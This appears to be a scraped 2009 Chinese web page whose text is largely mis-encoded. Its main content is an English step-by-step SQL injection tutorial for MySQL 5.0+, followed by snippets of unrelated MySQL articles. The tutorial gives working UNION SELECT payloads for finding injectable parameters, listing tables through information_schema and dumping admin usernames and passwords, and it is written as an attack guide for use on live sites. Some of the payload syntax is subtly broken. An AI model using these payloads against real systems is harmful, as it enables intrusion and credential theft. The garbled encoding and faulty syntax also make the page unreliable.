Ò׽ؽØͼÈí¼þ¡¢µ¥Îļþ¡¢Ãâ°²×°¡¢´¿ÂÌÉ«¡¢½ö160KB

[Injection]¶ÔMYSQL 5.0·þÎñÆ÷ÒÔÉÏ°æ±¾×¢Èë


by ZaraByte
How to do a SQL Injection for MYSQL Server 5.0+
1. Find a vulnerable add a ‘ at the end of the site example: news.php?id=1 add a ‘ at the end of the 1 and see if you get a syntax error
2. order by #–
Keep upping the # until you get an error.
3. union all select 1,#,#,#,#,#–
Above 6 numbers if the site you have shows more then 6 or less then since you need to add or remove them
4. Find a column # that is showed from step 2 example if there are 5 columns shown you can pick column 2
5. concat_ws(0×3A,version(),@@version) in vulnerable column
add concat_ws(0×3A,version(),@@version) to a vulnerable column like column 2 see if it shows the SQL version if it don’t try adding a – before the php?id=-# and see if you get the version
Will show the version of the SQL Server recommended that it be 5.0
6. union all select 1,group_concat(table_name),#,#,#,# from information_schema.tables where table_schema=database()–
This selects all the the tables from the database.
7. Find a table your after like admin or like users or user whatever table you wanna see
8. union all select 1,group_concat(column_name),#,#,#,# from information_schema.columns where table_name=char(x)–
Replace x with the ASCII of table name You will need to convert Text to ASCII.
9. union all select 1,group_concat(table_name,0×3a,table_name)#,#,#,# from column_name–
Replace table_name with the table name your after the 0×3a is hex for “:” table_name would be replaced with the other table name yours after
so for example say you found a table named admin and you wanna see the username and password columns you’d do
union all select 1,group_concat(username,0×3a,password,0×3c62723e)#,#,#,# from table_name–
Basically its going to show the username 0×3a is hex for “:” then the password 0×3c62723e is hex for a “< br >” which breaks them


Ïà¹ØÎĵµ£º

A simple mysql sample

#include <winsock2.h>
#include <stdio.h>
#include <stdlib.h>
#include <stdarg.h>
#include <mysql.h>
#pragma comment(lib,"libmysql")
int _tmain(int argc, _TCHAR* argv[])
{
MYSQL* mysql;
MYSQL_RES* results;
MYSQL_ROW record;
mysql = mysql_init(NULL);
if(! ......

MysqlµÄvarcharÀàÐÍ

×Ô´ÓÈÏʶmysqlµÄÄÇÌìÆð¾ÍÖªµÀvarcharµÄ³¤¶ÈÏÞÖÆΪ255£¬²»¹ýÏÖÔÚÕâÖÖÇé¿öÒѾ­¸Ä±äÁË£º
Values in VARCHAR columns are variable-length strings. The length can be specified as a value from 0 to 65,535. The effective maximum length of a VARCHAR is subject to the maximum row size (65,535 by ......

MySQL³£ÓòÙ×÷»ù±¾²Ù×÷


¹Ø¼ü×Ö: mysql³£ÓòÙ×÷»ù±¾²Ù×÷
MySQL³£ÓòÙ×÷»ù±¾²Ù×÷£¬ÒÔ϶¼ÊÇMySQL5.0ϲâÊÔͨ¹ýÊ×ÏÈ˵Ã÷Ï£¬¼ÇסÔÚÿ¸öÃüÁî½áÊøʱ¼ÓÉÏ£»£¨·ÖºÅ£©
1.µ¼³öÕû¸öÊý¾Ý¿â
mysqldump -u Óû§Ãû -p --default-character-set=latin1 Êý¾Ý¿âÃû > µ¼³öµÄÎļþÃû(Êý¾Ý¿âĬÈϱàÂëÊÇlatin1)
mysqldump -u wcnc -p smgp_apps_wcnc > wcnc. ......

MySQLÊý¾Ý¿â±¸·ÝºÍ»¹Ô­µÄ³£ÓÃÃüÁî


±¸·ÝMySQLÊý¾Ý¿âµÄÃüÁî
mysqldump -hhostname -uusername -ppassword databasename > backupfile.sql
±¸·ÝMySQLÊý¾Ý¿âΪ´øɾ³ý±íµÄ¸ñʽ
±¸·ÝMySQLÊý¾Ý¿âΪ´øɾ³ý±íµÄ¸ñʽ£¬Äܹ»Èøñ¸·Ý¸²¸ÇÒÑÓÐÊý¾Ý¿â¶ø²»ÐèÒªÊÖ¶¯É¾³ýÔ­ÓÐÊý¾Ý¿â¡£
mysqldump -–add-drop-table -uusername -ppassword databasename > bac ......

MySQL ±¸·ÝºÍ»Ö¸´

±¾ÎÄÌÖÂÛ MySQL µÄ±¸·ÝºÍ»Ö¸´»úÖÆ£¬ÒÔ¼°ÈçºÎά»¤Êý¾Ý±í£¬°üÀ¨×îÖ÷ÒªµÄÁ½ÖÖ±íÀàÐÍ£ºMyISAM ºÍ Innodb£¬ÎÄÖÐÉè¼ÆµÄ MySQL °æ±¾Îª 5.0.22¡£
Ä¿Ç° MySQL Ö§³ÖµÄÃâ·Ñ±¸·Ý¹¤¾ßÓУºmysqldump¡¢mysqlhotcopy£¬»¹¿ÉÒÔÓà SQL Óï·¨½øÐб¸·Ý£ºBACKUP TABLE »òÕß SELECT INTO OUTFILE£¬ÓÖ»òÕß±¸·Ý¶þ½øÖÆÈÕÖ¾£¨binlog£©£¬»¹¿ÉÒÔÊÇÖ±½Ó¿½± ......
© 2009 ej38.com All Rights Reserved. ¹ØÓÚE½¡ÍøÁªÏµÎÒÃÇ | Õ¾µãµØͼ | ¸ÓICP±¸09004571ºÅ